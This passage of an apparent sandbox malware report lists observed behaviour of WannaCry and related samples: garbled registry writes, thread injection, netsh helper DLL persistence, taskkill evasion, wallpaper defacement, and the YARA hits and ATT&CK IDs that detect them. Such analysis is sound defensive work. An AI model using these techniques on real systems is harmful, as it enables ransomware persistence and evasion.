Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{fbf687e6-f063-4d9f-9f4f-fd9a26acdd5f}\ = "ß³ËY[\f¯—§hŽÅªÈ[¿ûK;\x16˜œ“Xb¼\x0e¤"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{fbf687e6-f063-4d9f-9f4f-fd9a26acdd5f}\ProcessGroupPolicy = "å/ßµú\u008ds\x14—ˆåEÅEûOÉ\x13T@ˆà›\x03>¡õ¥"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}\DllName = "Õ€46¾K¼UˆÏ:ÄÞøW\fŒú"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa}\ = "t\ad\x0fzÕ¹1•ˆ\x1aùPD7io°/ãôDû)áò>ä"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E4F48E54-F38D-4884-BFB9-D4D2E5729C18}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}\ProcessGroupPolicy = "ôG‰éò=’º«OÖ\"\x17\x108ã\bÂ7+R¸ö6õ¨\n*"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39}\ProcessGroupPolicy = "é\fðÒ\r\x1e;\x02\x06;ÃO œT™…S\v2eýÿúØ\x1cQÝ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4B7C3B0F-E993-4E06-A241-3FBE06943684}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6A4C88C6-C502-4f74-8F60-2CB23EDC24E2}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\ProcessGroupPolicyEx = "r}¹?t\u00a0Ì\x02\\Õ²ÍZÕ6#µæÞlX>œ½n°(G"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27}\DllName = ")ƒ\x0e\u009d7°ï—êáRèNÁ–WReÂVº¹¨±\x12GÉò"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}\ProcessGroupPolicyEx = "NÚ•”cÛ†ú\x19”êõ\x01’\x18\vNä}\fØ\x13Š"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}\DisplayName = "\rš\x03ïœ\x12bÉÚœÅ$}\x7f#.@6<»\x18\"ˆ;Ñu±Á"	cmd.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

AutoIT Executable 7 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/6972-4337-0x0000000000900000-0x0000000000A9C000-memory.dmp	autoit_exe
behavioral1/memory/6596-4346-0x0000000000B30000-0x0000000000C24000-memory.dmp	autoit_exe
behavioral1/memory/3712-4367-0x0000000001010000-0x000000000111C000-memory.dmp	autoit_exe
behavioral1/memory/3676-4377-0x00000000002A0000-0x00000000008DD000-memory.dmp	autoit_exe
behavioral1/memory/6784-4380-0x0000000000800000-0x000000000090C000-memory.dmp	autoit_exe
behavioral1/memory/6176-4383-0x00000000009A0000-0x0000000000AAC000-memory.dmp	autoit_exe
behavioral1/memory/3676-4389-0x00000000002A0000-0x00000000008DD000-memory.dmp	autoit_exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3676 set thread context of 6972	3676	VeryFun.exe	373
PID 3676 set thread context of 6596	3676	VeryFun.exe	374
PID 3676 set thread context of 3712	3676	VeryFun.exe	375
PID 3676 set thread context of 6784	3676	VeryFun.exe	377
PID 3676 set thread context of 6176	3676	VeryFun.exe	378

UPX packed file 19 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023edd-4317.dat	upx
behavioral1/memory/3676-4334-0x00000000002A0000-0x00000000008DD000-memory.dmp	upx
behavioral1/memory/6972-4335-0x0000000000900000-0x0000000000A9C000-memory.dmp	upx
behavioral1/memory/6972-4336-0x0000000000900000-0x0000000000A9C000-memory.dmp	upx
behavioral1/memory/6972-4337-0x0000000000900000-0x0000000000A9C000-memory.dmp	upx
behavioral1/memory/6596-4342-0x0000000000B30000-0x0000000000C24000-memory.dmp	upx
behavioral1/memory/6596-4345-0x0000000000B30000-0x0000000000C24000-memory.dmp	upx
behavioral1/memory/6596-4346-0x0000000000B30000-0x0000000000C24000-memory.dmp	upx
behavioral1/memory/3712-4365-0x0000000001010000-0x000000000111C000-memory.dmp	upx
behavioral1/memory/3712-4366-0x0000000001010000-0x000000000111C000-memory.dmp	upx
behavioral1/memory/3712-4367-0x0000000001010000-0x000000000111C000-memory.dmp	upx
behavioral1/memory/3676-4377-0x00000000002A0000-0x00000000008DD000-memory.dmp	upx
behavioral1/memory/6784-4378-0x0000000000800000-0x000000000090C000-memory.dmp	upx
behavioral1/memory/6784-4380-0x0000000000800000-0x000000000090C000-memory.dmp	upx
behavioral1/memory/6784-4379-0x0000000000800000-0x000000000090C000-memory.dmp	upx
behavioral1/memory/6176-4381-0x00000000009A0000-0x0000000000AAC000-memory.dmp	upx
behavioral1/memory/6176-4383-0x00000000009A0000-0x0000000000AAC000-memory.dmp	upx
behavioral1/memory/6176-4382-0x00000000009A0000-0x0000000000AAC000-memory.dmp	upx
behavioral1/memory/3676-4389-0x00000000002A0000-0x00000000008DD000-memory.dmp	upx

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe	FreeYoutubeDownloader.exe
File created	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\System.ini	VeryFun.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 10 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	cmd.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	cmd.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	cmd.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RKill_V2.9.1.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RKill_V2.9.1.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VeryFun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RKill_V2.9.1.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FreeYoutubeDownloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RKill_V2.9.1.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	!WannaDecryptor!.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Detects application with GUI, possible interaction required

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
4732	taskkill.exe
4276	taskkill.exe
2588	taskkill.exe
2632	taskkill.exe
5156	taskkill.exe
100	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0}\BlockType = "PZ¡¤ù`16\u008d!þ\x141à\x03×‰±¯Æ:ã‡!ž>œ;"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{EDC0F17F-F4B7-47E4-B73E-887FAEB376FA}\Version = "xøSîÁ}¦\x1dò\u00a0ˆ¼\x1d_\x19ô2\t\u008d\x10\x17Òv×¤å\x1a8"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\ACCELERATED_GRAPHICS	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\XMLHTTP\HelpID = "wÔ\x0f¶\b”døCÍzå¡«\x06£àš¦Ê4ï&‹‚³²’"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7f7bd411-f034-4ac0-9424-224bd7ab4e4e}\AppPath = "’\aÜ\x19§o¬\x02œÃP:¹fðÌnj½€@¢½\rw¡gt"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{77BF5300-1474-4EC7-9980-D32B190E9B07}\Version = ".\u008d1&m‚\x1cE©t\u00ad\tá¡€ÅXÌñL™z“(úLÚ,"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2dec4925-1312-4d7f-a6f5-89272d848dcf}\AppName = "Ö%FsT‹é/ÊÕ0›6è¡ŽJ\|£»Éô»\x1a£ë\u0081%"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{85fc331e-bb64-4c53-ba25-3d8a956c02fd}\AppPath = "éù\x01ñ\x15¢×\x04X£d\x1aójêþît$Bóñ\x12˜\x1c\u008d\x06{"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\MULTIMEDIA\ALTERNATIVECODEC\Type = "\vN:#Ó\x03[\x16\\²¼ß‡ò\x11„–\x1eè‚ßö¡\x7fBc‰Á"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{472734EA-242A-422B-ADF8-83D1E48CC825}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{92085AD4-F48A-450D-BD93-B28CC7DF67CE}\BlockType = "Šo3€œ¢!·#ÀAl¿˜~\u00adI¨HÒ‹5…(½œä”"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\BLOCKMIXEDIMAGES\RegPoliciesPath = "\u00a0•Ä Œ‡*úJ'º›â<ˆÃpMglIt‘&hSêâ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "ÍüeÿFÿ3\x1eTK\x06·Ô"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\JAVA_VM\LOGGING\RegPoliciesPath = "ó\x05\u008dwÃ\x01uÚ¼òE\u009d‡\x17ìí´s6ìä«Í?ò¢AÇ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\MULTIMEDIA\ANIMAT\PlugUIText = "?T\x18’ù\x1a åq#c¢°L\"Ù/cqÏPd9O_NÛi"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{000D51DD-18E2-4D85-919A-10E3746C3F1B}\FWLink = "\x06\aíwððET—gØê7ªþ¤\x17€Î\u00ado™\x17›/dU‡"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{22BF413B-C6D2-4D91-82A9-A0F997BA588C}\CompatibilityFlags = "\x14AÆh×}r\x17Ðºì\\=ÿÊ,Ê@ÈK¼èìÎ\x05M\x05F"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{79CEEA4E-C231-4614-9E3B-53B2A02F39B7}\DllName = "\x10íðÐ\bGæ¶ª~ÐÞ\x05àô˜0\x0e˜ã\"6¹^åƒkê"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7f7bd411-f034-4ac0-9424-224bd7ab4e4e}\AppName = "tÓ^J;X_ÕÏ4ïOoaueç\x16ž\u008d9\u008d^0æåŠM"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{B8E73359-3422-4384-8D27-4EA1B4C01232}\AlternateCLSID = "t\x03¦\u0081;\x1e›Ô\x06\r\x1e%ÎG4\u00a0Î,\x02€–\u008d$wG\x10ï”"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PHISHINGFILTER	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\ULINKS\ALWAYS\RegPath = "ö`u"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\MULTIMEDIA\PLACEHOLDERS\Type = "\x0eßÆBD2—a±çŽ\x06™%»Å²aIyr#–\u008dâ¡Àø"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{EAEE5C74-6D0D-4ACA-9232-0DA4A7B866BA}\Version = "\x11… \vÞ\x7fÌ2;\x0fTl•Š5ÿ¶‘áÉ\x04IBzµYjJ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Icon = "i\u0081\v×†Â&\x1bUL\u0081h– ×Î’ôÍ*ŒÓ7êï\x19¡v"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B43A0C1E-B63F-4691-B68F-CD807A45DA01}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{472734EA-242A-422B-ADF8-83D1E48CC825}\DllName = "\b\bñ÷G¸'\x1f((l¥SW"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{889D2FEB-5411-4565-8998-1DD2C5261283}\CompatibilityFlags = "ó\u0081O\x7f½Aþ\u008fž\u0090f‡>í\x7f•þ\x1bcü\x04ÐÂ×ƒÇ)á"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\SearchSuggestion	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{77BF5300-1474-4EC7-9980-D32B190E9B07}\BlockType = "kîHA\x1d\u00adjô.Ýn›ìDÌ\x1c¦–¾aèUë\u0090Ü t£"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\INTERNATIONAL\UTF8_URL\HelpID = "8ß²\u00ad\|àªšÂ\x1e‡\x1f¼î+ÄI\fPWOm\u00adIÑÑfõ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\StartPage	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{31CF9EBE-5755-4A1D-AC25-2834D952D9B4}\DllName = "ûÕ{³ßµ\x1daJ\rÂ»ñUíÍ\x03ê¼“Né\x18\x02/_ë^"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{DCC70A83-E184-40A3-906B-779AF5E941C4}\CompatibilityFlags = "J\u00ad\v\v‚½è•}Þ+£¶Z•u¬`}ƒü¿°n\x065BÕ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD993BDC-06E0-4131-B889-DD3B9AEBE253}\AppPath = "â§ä)\x11¥_Å„?iL\x03\x1f0@QÐþBÌùÃÊu—®B"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\HIDENEWEDGEBUTTON	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\USEBHO\UncheckedValue = "Úp~jêKÅ{µ\x1e<\x01LG\x06Xîk/Ü•¿ÆA¿„’¨"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\FTPUI\RegPath = "±ª™FÇ„\x10Ì¼f¥AóPÐÁ+"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{2D90D33C-DE76-42D0-9040-E4466DDC24AC}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{5AA2BA46-9913-4DC7-9620-69AB0FA17AE7}\DllName = "yÌ€·(xLš¯¸ÊGð)¿°\x18\x12ÊCbÿËØ§Ðán"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\ACR\Type = "n–ßÇvb\"y³µÕb¼qäŽ#›¡\x13E„Ô±Øª%v"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{00020820-0000-0000-c000-000000000046}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\SSL3.0\ValueName = "Á*K\x10\x19ä”ƒøùæãˆ¹ÿ\\Š´°\u008f(Ž þ{\x11}/"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{AA58ED58-01DD-4D91-8333-CF10577473F7}\BlockType = "\x01¼Í\x11ÞÜü\n\";ü›ÆÏ¶\u008f“voY‚é\u00adÝpßðB"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\HTTP\PROXY\Text = "uÞïÝ¢ì€ph?ä\x18QÅ\\zŠHÀ¿`ô.\x17È_\x13Ö"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{aff735eb-cdf9-4894-aa69-3e3131128618}\AppPath = "ž)’ÛMO\t¹þ–\u0090ƒË#Í\u008f MŸìz\x01\x116ƒº\x1f#"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\FRIENDLY_ERRORS\ValueName = "Í‹ïÉÎ™õ³É"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\CHECK_SIG\CheckedValue = "\x14î´:Lo>Ÿ¹Ù\x03±â3…PÄYoó•E\x1d~ú¥\x03¼"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\SUBMIT\RegPoliciesPath = "œ?òñËq©Çã\u0090)ÛXVÇ´,ÄâÒü¢4ÿ(\u008d\x11/"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{C94158E1-6151-4442-ABE6-FD53D6534CCB}\FWLink = "è{´o‹\u0081ÍtÎ›¢ËÈj/K·ÂC\x1eÖ\x19P½è´dD"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\NEGOTIATE\HelpID = "J>Þr‹·™è°\"\u008däÞ\x0f\x1cï¡¾#-¼´@vk²”9"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\NEGOTIATE\ValueName = "xÃ\"ðÀ\a\u008fÑA›Ø@*\x1eé-ž\x19S\x04\x18ìŽhØ2-ˆ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{387EDF53-1CF2-4523-BC2F-13462651BE8C}\BlockType = "’#\x19ö464]y\x10\u0081Ö´VìhÆ¶¯Ã‚ƒ\x14òÍ\x13\aN"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70f641fd-9ffc-4d5b-a4dc-962af4ed7999}\AppPath = "òÓš1cœ=ÂÌØ\x18\b\"N3¡ª”Íƒß¼S\x13·'çÊ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\INTERNATIONAL\UTF8URLQUERY_ALWAYS\Type = "]µ™+‡N\x04Q¿ÿüi\rõ£ä¢fX\x04ä\"\x1b\x1bÐ\x15{s"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\SearchSuggestion\RegistryRoot = "Zès™©³J5Qe\u00adàÅg2.\x1añ\v²\x1f©\x1eª«)ŒÑ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{179E4A98-A3C4-407D-8C66-E63B67BB6F4A}\Version = "\aÑBA@‡ì£L¾2á\x0eüÐGô\u009d++&\x10ÃéCeói"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{777D0B4C-75C9-4874-ABFF-80B4BE8DC532}\BlockType = "O{î¨\v\x1cW\x1f‚w¯áokt\aù\x1büqÙYq;7Ã0Í"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\USEBHO\HelpID = "Ž\x1aÿŽ¿\x10sP0R\u008f\x19¼5712~_¬w9ù\aÃ—›ß"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\ThirdPartyCookies	cmd.exe
